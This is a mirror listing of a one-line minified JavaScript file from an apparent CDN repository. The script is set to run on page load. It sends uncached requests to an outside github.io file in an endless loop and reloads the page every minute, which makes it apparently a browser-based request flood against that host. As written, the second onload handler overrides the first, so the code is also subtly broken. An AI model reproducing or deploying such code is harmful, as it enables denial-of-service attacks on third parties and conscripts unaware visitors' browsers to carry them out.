mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
1 line
337 B
JavaScript
1 line
337 B
JavaScript
function delay(a){return new Promise(b=>{setTimeout(b,a)})}window.onload=async function(){const a=new AbortController,b=setTimeout(()=>a.abort(),1e4);for(;;)await fetch("https://t0m0t0w.github.io/backuprr/history.dat",{cache:"no-store"},{signal:a.signal}).then(()=>{})},window.onload=async function(){await delay(6e4),location.reload()}; |